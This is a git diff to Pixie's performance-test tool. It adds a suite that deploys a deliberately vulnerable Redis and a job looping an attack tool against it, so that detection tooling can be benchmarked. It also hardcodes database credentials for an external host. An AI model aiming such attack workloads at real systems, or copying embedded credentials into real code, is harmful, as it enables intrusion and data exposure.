+						SkipNamespaceDelete: true,
+					},
+				},
+			},
+			{
+				DeployType: &pb.DeployStep_Prerendered{
+					Prerendered: &pb.PrerenderedDeploy{
+						YAMLPaths: []string{
+							fmt.Sprintf("%s/helm-rendered/vector.rendered.yaml", sovereignSOCYAMLRoot),
+						},
+						SkipNamespaceDelete: true,
+					},
+				},
+			},
+		},
+		Healthchecks: []*pb.HealthCheck{
+			{
+				CheckType: &pb.HealthCheck_K8S{
+					K8S: &pb.K8SPodsReadyCheck{
+						Namespace: "honey",
+					},
+				},
+			},
+		},
+	}
+}
+
+// SovereignSOCInfraSelector is the action_selector tagged onto the
+// kubescape-vector workload so it runs in a dedicated START_WORKLOADS
+// phase before START_METRIC_RECORDERS — see the docstring on
+// KubescapeVectorWorkload.
+const SovereignSOCInfraSelector = "infra"
+
+// RedisVulnerableWorkload deploys the pre-populated Kubescape
+// ApplicationProfile and the intentionally vulnerable Redis 7.2.10 used by
+// the sovereign-soc suite. Both YAMLs land in the `redis` namespace.
+// Assumes the target cluster has Kubescape (honey/node-agent) preinstalled
+// — the k8ssandra suite has the same "external prerequisite" shape.
+func RedisVulnerableWorkload() *pb.WorkloadSpec {
+	return &pb.WorkloadSpec{
+		Name: "redis-vulnerable",
+		DeploySteps: []*pb.DeployStep{
+			{
+				DeployType: &pb.DeployStep_Prerendered{
+					Prerendered: &pb.PrerenderedDeploy{
+						YAMLPaths: []string{
+							fmt.Sprintf("%s/redis-sbob.yaml", sovereignSOCYAMLRoot),
+							fmt.Sprintf("%s/redis-vulnerable.yaml", sovereignSOCYAMLRoot),
+						},
+					},
+				},
+			},
+		},
+		Healthchecks: redisHealthChecks("redis"),
+	}
+}
+
+// BobctlAttackWorkload deploys a Kubernetes Job that runs `bobctl attack`
+// against the vulnerable redis deployment in a tight loop for the
+// experiment's duration. The Job's init container downloads the bobctl
+// binary from the upstream release; the attack suite is mounted from the
+// bob-suite-attack ConfigMap.
+func BobctlAttackWorkload() *pb.WorkloadSpec { + return &pb.WorkloadSpec{ + Name: "bobctl-attack", + DeploySteps: []*pb.DeployStep{ + { + DeployType: &pb.DeployStep_Prerendered{ + Prerendered: &pb.PrerenderedDeploy{ + YAMLPaths: []string{ + fmt.Sprintf("%s/bob-suite-attack-cm.yaml", sovereignSOCYAMLRoot), + fmt.Sprintf("%s/bobctl-attack-job.yaml", sovereignSOCYAMLRoot), + }, + }, + }, + }, + }, + Healthchecks: []*pb.HealthCheck{ + { + CheckType: &pb.HealthCheck_K8S{ + K8S: &pb.K8SPodsReadyCheck{ + Namespace: "redis", + }, + }, + }, + }, + } +} + +// redisHealthChecks mirrors HTTPHealthChecks but asserts on Pixie's +// redis_events table instead of http_events. +func redisHealthChecks(namespace string) []*pb.HealthCheck { + checks := []*pb.HealthCheck{ + { + CheckType: &pb.HealthCheck_K8S{ + K8S: &pb.K8SPodsReadyCheck{ + Namespace: namespace, + }, + }, + }, + } + t, err := template.New("").Parse(redisDataInNamespaceScript) + if err != nil { + log.WithError(err).Fatal("failed to parse Redis healthcheck script") + } + buf := &strings.Builder{} + err = t.Execute(buf, &struct { + Namespace string + }{ + Namespace: namespace, + }) + if err != nil { + log.WithError(err).Fatal("failed to execute Redis healthcheck template") + } + checks = append(checks, &pb.HealthCheck{ + CheckType: &pb.HealthCheck_PxL{ + PxL: &pb.PxLHealthCheck{ + Script: buf.String(), + SuccessColumn: "success", + }, + }, + }) + return checks +} + +// SovereignSOCRedisAttackExperiment drives the vulnerable redis deployment +// with a continuous bobctl attack loop while Pixie is running. The +// clickhouse_export PxL script continuously exports a windowed slice of +// redis_events to the forensic ClickHouse cluster; KubescapeNodeAgent and +// ForensicAlertCount track the anomaly side, ProcessStats/Heap/CH operator +// track Pixie and CH health. +// +// exportDSN is the ClickHouse endpoint Kelvin uses for px.export; it MUST +// be reachable from the experiment cluster's network. Pointing this at an +// in-cluster service DNS name of a different cluster will crash Kelvin +// because ClickHouseExportSinkNode::OpenImpl does not catch exceptions +// thrown by the clickhouse-cpp client constructor on DNS failure. +// +// alertsDSN is the ClickHouse endpoint the perf tool reads forensic_db +// alerts from via clickhouse_dsn=. It can be a different cluster/db/user +// from exportDSN. A failure here will only error the forensic-alerts +// metric; it will not crash Kelvin. +func SovereignSOCRedisAttackExperiment( + metricPeriod time.Duration, + exportPeriod time.Duration, + exportWindow time.Duration, + exportDSN string, + exportTable string, + alertsDSN string, + alertsTable string, + alertCountWindow time.Duration, + predeployDur time.Duration, + dur time.Duration, +) *pb.ExperimentSpec { + e := &pb.ExperimentSpec{ + VizierSpec: VizierWorkload(), + WorkloadSpecs: []*pb.WorkloadSpec{ + // Kubescape + Vector first so the node-agent is running and + // Vector's log pipeline is live before any attack traffic is + // generated. Vector ships node-agent logs to + // forensic_db.kubescape_logs on the external forensic CH. + KubescapeVectorWorkload(), + RedisVulnerableWorkload(), + BobctlAttackWorkload(), + }, + MetricSpecs: []*pb.MetricSpec{ + ProcessStatsMetrics(metricPeriod), + // Stagger the heap query slightly because of known query stability issues. 
+ HeapMetrics(metricPeriod + (2 * time.Second)), + ClickHouseExportLoadMetric(exportPeriod, exportDSN, exportTable, exportTable, exportWindow), + ClickHouseOperatorMetrics(metricPeriod), + KubescapeNodeAgentMetrics(metricPeriod), + ForensicAlertCountMetric(metricPeriod, alertsDSN, alertsTable, alertCountWindow), + }, + RunSpec: &pb.RunSpec{ + Actions: []*pb.ActionSpec{ + { + Type: pb.START_VIZIER, + }, + { + // Deploy kubescape+vector first so the node-agent's + // prometheus listener on :8080 is up before the + // metric recorder pre-flights port-forwards. Without + // this ordering, the recorder errors out at startup. + Type: pb.START_WORKLOADS, + Name: SovereignSOCInfraSelector, + }, + { + Type: pb.START_METRIC_RECORDERS, + }, + { + Type: pb.BURNIN, + Duration: types.DurationProto(predeployDur), + }, + { + // Default selector (empty) catches the redis + + // bobctl-attack workloads. + Type: pb.START_WORKLOADS, + }, + { + Type: pb.RUN, + Duration: types.DurationProto(dur), + }, + { + Type: pb.STOP_METRIC_RECORDERS, + }, + }, + }, + ClusterSpec: DefaultCluster, + } + e = addTags(e, + "workload/sovereign-soc", + "workload/redis-attack", + fmt.Sprintf("parameter/export_window/%s", exportWindow), + fmt.Sprintf("parameter/alert_count_window/%s", alertCountWindow), + ) + return e +} diff --git a/src/e2e_test/perf_tool/pkg/suites/suites.go b/src/e2e_test/perf_tool/pkg/suites/suites.go index 4d5597ddf04..f3d89618986 100644 --- a/src/e2e_test/perf_tool/pkg/suites/suites.go +++ b/src/e2e_test/perf_tool/pkg/suites/suites.go @@ -30,15 +30,17 @@ type ExperimentSuite func() map[string]*pb.ExperimentSpec // ExperimentSuiteRegistry contains all the ExperimentSuite, keyed by name. var ExperimentSuiteRegistry = map[string]ExperimentSuite{ - "nightly": nightlyExperimentSuite, - "http-grid": httpGridSuite, - "k8ssandra": k8ssandraExperimentSuite, + "nightly": nightlyExperimentSuite, + "http-grid": httpGridSuite, + "k8ssandra": k8ssandraExperimentSuite, + "clickhouse-exec": clickhouseExecSuite, + "sovereign-soc": sovereignSOCSuite, } func nightlyExperimentSuite() map[string]*pb.ExperimentSpec { defaultMetricPeriod := 30 * time.Second preDur := 5 * time.Minute - dur := 40 * time.Minute + dur := 5 * time.Minute httpNumConns := 100 exps := map[string]*pb.ExperimentSpec{ "http-loadtest/100/100": HTTPLoadTestExperiment(httpNumConns, 100, defaultMetricPeriod, preDur, dur), @@ -73,6 +75,55 @@ func k8ssandraExperimentSuite() map[string]*pb.ExperimentSpec { return exps } +// clickhouseExecSuite covers the two sides of Pixie's ClickHouse integration +// under load: the write/export path and the read/query path. Both experiments +// share the same metric shape (process/heap/clickhouse-operator) so results +// can be compared directly. +// +// The ClickHouse operator metrics are scraped via the prometheus recorder +// named "clickhouse-operator" -- point the CLI at the correct cluster with: +// +// --prom_recorder_override clickhouse-operator=/path/to/kubeconfig:my-ctx +func clickhouseExecSuite() map[string]*pb.ExperimentSpec { + defaultMetricPeriod := 30 * time.Second + preDur := 5 * time.Minute + // preDur := 2 * time.Minute + dur := 20 * time.Minute + // dur := 5 * time.Minute + httpNumConns := 100 + httpTargetRPS := 3000 + + // Tight cadence on the export/read scripts to apply real pressure. 
+ exportPeriod := 5 * time.Second + exportWindow := 30 * time.Second + readPeriod := 5 * time.Second + readWindow := 5 * time.Minute + + clickhouseDSN := "pixie:pixie_password@clickhouse.forensic.austrianopencloudcommunity.org:9000/default" + clickhouseTable := "http_events" + + exps := map[string]*pb.ExperimentSpec{ + "clickhouse-export": ClickHouseExportExperiment( + httpNumConns, httpTargetRPS, + defaultMetricPeriod, + exportPeriod, exportWindow, + clickhouseDSN, clickhouseTable, + preDur, dur, + ), + "clickhouse-read": ClickHouseReadExperiment( + httpNumConns, httpTargetRPS, + defaultMetricPeriod, + readPeriod, readWindow, + clickhouseDSN, clickhouseTable, + preDur, dur, + ), + } + for _, e := range exps { + addTags(e, "suite/clickhouse-exec") + } + return exps +} + func httpGridSuite() map[string]*pb.ExperimentSpec { defaultMetricPeriod := 30 * time.Second preDur := 5 * time.Minute @@ -115,3 +166,59 @@ func httpGridSuite() map[string]*pb.ExperimentSpec { } return exps } + +// sovereignSOCSuite drives the Sovereign SOC demo workflow (vulnerable +// Redis 7.2.10 + bobctl attack loop + Kubescape anomaly generation + +// forensic ClickHouse export) under perf_tool orchestration. Assumes the +// target cluster already has Kubescape (honey namespace, app=node-agent +// DaemonSet), an Altinity ClickHouse operator in the `clickhouse` namespace, +// and Vector tailing kubescape logs into forensic_db.alerts — same +// pre-installed-dependency shape as the k8ssandra suite. Point prometheus +// recorders at the forensic cluster via +// +// --prom_recorder_override clickhouse-operator=: +// --prom_recorder_override kubescape-node-agent=: +func sovereignSOCSuite() map[string]*pb.ExperimentSpec { + defaultMetricPeriod := 30 * time.Second + preDur := 2 * time.Minute + dur := 20 * time.Minute + + exportPeriod := 5 * time.Second + exportWindow := 30 * time.Second + alertCountWindow := 1 * time.Minute + + // Both DSNs target the same external forensic endpoint with the same + // pixie user (which has been granted SHOW/SELECT/INSERT on forensic_db.* + // out-of-band). The endpoint MUST be reachable from the experiment + // cluster's network — the clickhouse-cpp client will crash Kelvin with + // SIGSEGV if DNS fails (see ClickHouseExportSinkNode TODO). + // - exportDSN: /default — where Pixie's CH export sink writes. + // - alertsDSN: /forensic_db — where Vector lands Kubescape alerts. + // forensic_db must be pre-created via soc/tree/clickhouse-lab/schema.sql; + // this suite does not bootstrap CH schemas (CH is shared infra). + const clickhouseHost = "clickhouse.forensic.austrianopencloudcommunity.org:9000" + const clickhouseCreds = "pixie:pixie_password" + exportDSN := fmt.Sprintf("%s@%s/default", clickhouseCreds, clickhouseHost) + alertsDSN := fmt.Sprintf("%s@%s/forensic_db", clickhouseCreds, clickhouseHost) + exportTable := "redis_events" + // Vector writes raw kubescape alerts to forensic_db.kubescape_logs (see + // helm-rendered/vector-values.yaml kubescape_clickhouse sink). A + // separate forensic_db.alerts materialized view / projection exists in + // some demo variants but is not populated by the stock Vector config. 
+ alertsTable := "kubescape_logs" + + exps := map[string]*pb.ExperimentSpec{ + "redis-attack": SovereignSOCRedisAttackExperiment( + defaultMetricPeriod, + exportPeriod, exportWindow, + exportDSN, exportTable, + alertsDSN, alertsTable, + alertCountWindow, + preDur, dur, + ), + } + for _, e := range exps { + addTags(e, "suite/sovereign-soc") + } + return exps +} diff --git a/src/e2e_test/perf_tool/pkg/suites/workloads.go b/src/e2e_test/perf_tool/pkg/suites/workloads.go index e0679e5cfb8..dd91bc02715 100644 --- a/src/e2e_test/perf_tool/pkg/suites/workloads.go +++ b/src/e2e_test/perf_tool/pkg/suites/workloads.go @@ -30,6 +30,32 @@ import ( pb "px.dev/pixie/src/e2e_test/perf_tool/experimentpb" ) +// VizierReleaseWorkload returns the workload spec to deploy a released version of Vizier via `px deploy`. +// This skips the skaffold build step, using pre-built images from the Pixie release. +func VizierReleaseWorkload() *pb.WorkloadSpec { + return &pb.WorkloadSpec{ + Name: "vizier", + DeploySteps: []*pb.DeployStep{ + { + DeployType: &pb.DeployStep_Px{ + Px: &pb.PxCLIDeploy{ + Args: []string{ + "deploy", + }, + SetClusterID: true, + Namespaces: []string{ + "pl", + "px-operator", + "olm", + }, + }, + }, + }, + }, + Healthchecks: VizierHealthChecks(), + } +} + // VizierWorkload returns the workload spec to deploy Vizier. func VizierWorkload() *pb.WorkloadSpec { return &pb.WorkloadSpec{ @@ -189,6 +215,36 @@ func OnlineBoutiqueWorkload() *pb.WorkloadSpec { } } +// ClickHouseReadLoadWorkload deploys the (future) skaffold application that +// generates sustained ClickHouse read traffic alongside the Pixie read +// experiment. The skaffold path below is a placeholder; wire up the real +// application once it exists in the tree. +func ClickHouseReadLoadWorkload() *pb.WorkloadSpec { + return &pb.WorkloadSpec{ + Name: "clickhouse-read-load", + DeploySteps: []*pb.DeployStep{ + { + DeployType: &pb.DeployStep_Skaffold{ + Skaffold: &pb.SkaffoldDeploy{ + // TODO(ddelnano): replace with the real skaffold path once + // the ClickHouse read-load generator app lands. + SkaffoldPath: "src/e2e_test/clickhouse_read_load/skaffold.yaml", + }, + }, + }, + }, + Healthchecks: []*pb.HealthCheck{ + { + CheckType: &pb.HealthCheck_K8S{ + K8S: &pb.K8SPodsReadyCheck{ + Namespace: "px-clickhouse-read-load", + }, + }, + }, + }, + } +} + // KafkaWorkload returns the WorkloadSpec to deploy the kafka demo. func KafkaWorkload() *pb.WorkloadSpec { return &pb.WorkloadSpec{ diff --git a/src/e2e_test/perf_tool/ui/index.html b/src/e2e_test/perf_tool/ui/index.html new file mode 100644 index 00000000000..e57432b207e --- /dev/null +++ b/src/e2e_test/perf_tool/ui/index.html @@ -0,0 +1,1215 @@ + + + + + + Pixie Perf Tool Dashboard + + + + +
diff --git a/src/e2e_test/perf_tool/ui/index.html b/src/e2e_test/perf_tool/ui/index.html
new file mode 100644
index 00000000000..e57432b207e
--- /dev/null
+++ b/src/e2e_test/perf_tool/ui/index.html
@@ -0,0 +1,1215 @@
+<!-- [File body omitted: 1215-line single-page "Pixie Perf Tool Dashboard"
+     (DuckDB WASM + Parquet); the markup did not survive extraction.
+     Recoverable UI text: an "Initializing DuckDB..." status banner; a
+     "Data Source" panel with a drag-and-drop / click-to-browse target for
+     results_*.parquet and spec.parquet files; and an alternative GCS bucket
+     loader noting "Bucket must be publicly readable or have CORS
+     configured."] -->
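The CORS requirement surfaced in the dashboard's bucket loader can be satisfied with the Go GCS client. A sketch assuming the cloud.google.com/go/storage package and a placeholder bucket name (neither appears in this diff); in practice, tighten Origins to the origin the dashboard is served from:

package main

import (
	"context"
	"log"
	"time"

	"cloud.google.com/go/storage"
)

func main() {
	ctx := context.Background()
	client, err := storage.NewClient(ctx)
	if err != nil {
		log.Fatal(err)
	}
	defer client.Close()

	// Allow browser fetches (DuckDB-WASM uses ranged GETs to read parquet).
	_, err = client.Bucket("my-perf-results-bucket").Update(ctx, storage.BucketAttrsToUpdate{
		CORS: []storage.CORS{{
			MaxAge:          time.Hour,
			Methods:         []string{"GET", "HEAD"},
			Origins:         []string{"*"}, // tighten to the dashboard origin
			ResponseHeaders: []string{"Content-Type", "Content-Range", "Range"},
		}},
	})
	if err != nil {
		log.Fatal(err)
	}
}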
diff --git a/src/e2e_test/protocol_loadtest/skaffold_client.yaml b/src/e2e_test/protocol_loadtest/skaffold_client.yaml
index 3939defe219..a85de725773 100644
--- a/src/e2e_test/protocol_loadtest/skaffold_client.yaml
+++ b/src/e2e_test/protocol_loadtest/skaffold_client.yaml
@@ -7,6 +7,8 @@ build:
     context: .
     bazel:
       target: //src/e2e_test/protocol_loadtest/client:protocol_loadtest_client_image.tar
+      args:
+        - --config=x86_64_sysroot
   tagPolicy:
     dateTime: {}
   local:
diff --git a/src/e2e_test/protocol_loadtest/skaffold_loadtest.yaml b/src/e2e_test/protocol_loadtest/skaffold_loadtest.yaml
index f6d25ba9ed6..87b38a59ee1 100644
--- a/src/e2e_test/protocol_loadtest/skaffold_loadtest.yaml
+++ b/src/e2e_test/protocol_loadtest/skaffold_loadtest.yaml
@@ -7,6 +7,8 @@ build:
     context: .
     bazel:
       target: //src/e2e_test/protocol_loadtest:protocol_loadtest_server_image.tar
+      args:
+        - --config=x86_64_sysroot
   tagPolicy:
     dateTime: {}
   local:
diff --git a/src/utils/shared/k8s/apply.go b/src/utils/shared/k8s/apply.go
index c25858ce6d7..0a5e4100dea 100644
--- a/src/utils/shared/k8s/apply.go
+++ b/src/utils/shared/k8s/apply.go
@@ -30,6 +30,7 @@ import (
 	"strings"
 
 	log "github.com/sirupsen/logrus"
 	k8serrors "k8s.io/apimachinery/pkg/api/errors"
+	"k8s.io/apimachinery/pkg/api/meta"
 	metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
 	"k8s.io/apimachinery/pkg/apis/meta/v1/unstructured"
@@ -235,8 +236,15 @@ func ApplyResources(clientset kubernetes.Interface, config *rest.Config, resourc
 	}
 
 	nsRes := res.Namespace(objNS)
+	// Use the REST mapping's scope to decide between cluster- and
+	// namespace-scoped client paths. The previous implementation kept a
+	// hardcoded allowlist of cluster-scoped kinds and tried to namespace-
+	// qualify everything else, which produced "the server could not find
+	// the requested resource" 404s for any cluster-scoped resource not
+	// in the list (e.g. APIService, PriorityClass, or cluster-scoped CRs
+	// like RuntimeRuleAlertBinding).
 	createRes := nsRes
-	if k8sRes == "validatingwebhookconfigurations" || k8sRes == "mutatingwebhookconfigurations" || k8sRes == "namespaces" || k8sRes == "configmap" || k8sRes == "clusterrolebindings" || k8sRes == "clusterroles" || k8sRes == "customresourcedefinitions" {
+	if mapping.Scope != nil && mapping.Scope.Name() == meta.RESTScopeNameRoot {
 		createRes = res
 	}
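The scope test reads more clearly in isolation. An illustrative restatement (the helper name is hypothetical; meta.RESTMapping and meta.RESTScopeNameRoot are the real apimachinery types used above):

package k8s

import "k8s.io/apimachinery/pkg/api/meta"

// isClusterScoped reports whether a discovery RESTMapping describes a
// cluster-scoped resource. Cluster-scoped resources carry the "root" REST
// scope; namespaced ones report meta.RESTScopeNameNamespace and must go
// through the namespace-qualified dynamic client.
func isClusterScoped(mapping *meta.RESTMapping) bool {
	return mapping.Scope != nil && mapping.Scope.Name() == meta.RESTScopeNameRoot
}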
diff --git a/src/utils/shared/k8s/delete.go b/src/utils/shared/k8s/delete.go
index 3adb2c8b986..689e0f8be54 100644
--- a/src/utils/shared/k8s/delete.go
+++ b/src/utils/shared/k8s/delete.go
@@ -29,7 +29,9 @@ import (
 	"k8s.io/apimachinery/pkg/api/errors"
 	"k8s.io/apimachinery/pkg/api/meta"
 	metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
+	"k8s.io/apimachinery/pkg/apis/meta/v1/unstructured"
 	"k8s.io/apimachinery/pkg/runtime"
+	"k8s.io/apimachinery/pkg/runtime/schema"
 	"k8s.io/apimachinery/pkg/util/sets"
 	"k8s.io/cli-runtime/pkg/genericclioptions"
 	"k8s.io/cli-runtime/pkg/printers"
@@ -44,6 +46,12 @@ import (
 	cmdwait "k8s.io/kubectl/pkg/cmd/wait"
 )
 
+var apiServiceGVR = schema.GroupVersionResource{
+	Group:    "apiregistration.k8s.io",
+	Version:  "v1",
+	Resource: "apiservices",
+}
+
 // ObjectDeleter has methods to delete K8s objects and wait for them. This code is adopted from `kubectl delete`.
 type ObjectDeleter struct {
 	Namespace string
@@ -110,6 +118,32 @@ func (o *ObjectDeleter) DeleteNamespace() error {
 	return err
}
 
+// getAggregatedGroupVersions returns the set of group/versions that are served
+// by an aggregated APIService (spec.service is non-nil). Resources in those
+// groups are skipped during cluster-wide deletion sweeps because aggregated
+// servers frequently advertise the delete verb on read-only virtual resources
+// and then fail the call with "operation not supported".
+func (o *ObjectDeleter) getAggregatedGroupVersions() (sets.String, error) {
+	out := sets.NewString()
+	list, err := o.dynamicClient.Resource(apiServiceGVR).List(context.TODO(), metav1.ListOptions{})
+	if err != nil {
+		if errors.IsNotFound(err) || meta.IsNoMatchError(err) {
+			return out, nil
+		}
+		return nil, err
+	}
+	for _, item := range list.Items {
+		svc, found, err := unstructured.NestedMap(item.Object, "spec", "service")
+		if err != nil || !found || svc == nil {
+			continue
+		}
+		group, _, _ := unstructured.NestedString(item.Object, "spec", "group")
+		version, _, _ := unstructured.NestedString(item.Object, "spec", "version")
+		out.Insert(schema.GroupVersion{Group: group, Version: version}.String())
+	}
+	return out, nil
+}
+
 func (o *ObjectDeleter) getDeletableResourceTypes() ([]string, error) {
 	discoveryClient, err := o.rcg.ToDiscoveryClient()
 	if err != nil {
@@ -121,11 +155,19 @@ func (o *ObjectDeleter) getDeletableResourceTypes() ([]string, error) {
 		return nil, err
 	}
 
+	aggregated, err := o.getAggregatedGroupVersions()
+	if err != nil {
+		return nil, err
+	}
+
 	resources := []string{}
 	for _, list := range lists {
 		if len(list.APIResources) == 0 {
 			continue
 		}
+		if aggregated.Has(list.GroupVersion) {
+			continue
+		}
 		for _, resource := range list.APIResources {
 			if len(resource.Verbs) == 0 {
@@ -145,6 +187,9 @@ func (o *ObjectDeleter) DeleteByLabel(selector string, resourceKinds ...string) 
 	if err := o.initRestClientGetter(); err != nil {
 		return 0, err
 	}
+	if err := o.initDynamicClient(); err != nil {
+		return 0, err
+	}
 	b := resource.NewBuilder(o.rcg)
 
 	if len(resourceKinds) == 0 {
@@ -169,9 +214,6 @@ func (o *ObjectDeleter) DeleteByLabel(selector string, resourceKinds ...string) 
 	if err != nil {
 		return 0, err
 	}
-	if err := o.initDynamicClient(); err != nil {
-		return 0, err
-	}
 	return o.runDelete(r)
 }
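The set lookup above lines up because discovery reports each APIResourceList's GroupVersion in the same "group/version" string form that schema.GroupVersion.String() produces. A quick illustration (metrics.k8s.io is used only as a familiar aggregated-API example, not something this diff touches):

package main

import (
	"fmt"

	"k8s.io/apimachinery/pkg/runtime/schema"
)

func main() {
	// Matches the discovery client's APIResourceList.GroupVersion field for
	// the metrics-server aggregated API.
	gv := schema.GroupVersion{Group: "metrics.k8s.io", Version: "v1beta1"}
	fmt.Println(gv.String()) // metrics.k8s.io/v1beta1
}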
"" : absl::Substitute(" ON CLUSTER '$0'", cluster_name_); + clickhouse_client_->Execute( + absl::Substitute("DROP TABLE IF EXISTS $0$1", table_name, drop_cluster_clause)); } // Create new table @@ -1276,7 +1286,8 @@ class CreateClickHouseSchemas final : public carnot::udf::UDTF column_defs; // Add columns from schema @@ -1301,14 +1312,21 @@ class CreateClickHouseSchemas final : public carnot::udf::UDTF= 22.x). + std::string engine = cluster_name.empty() ? "MergeTree()" : "ReplicatedMergeTree()"; std::string create_sql = absl::Substitute(R"( - CREATE TABLE $0$1 ( - $2 - ) ENGINE = MergeTree() + CREATE TABLE $0$1$2 ( + $3 + ) ENGINE = $4 PARTITION BY toYYYYMM(event_time) ORDER BY (hostname, event_time) )", - if_not_exists_clause, table_name, columns_str); + if_not_exists_clause, table_name, on_cluster_clause, + columns_str, engine); return create_sql; } @@ -1326,6 +1344,7 @@ class CreateClickHouseSchemas final : public carnot::udf::UDTF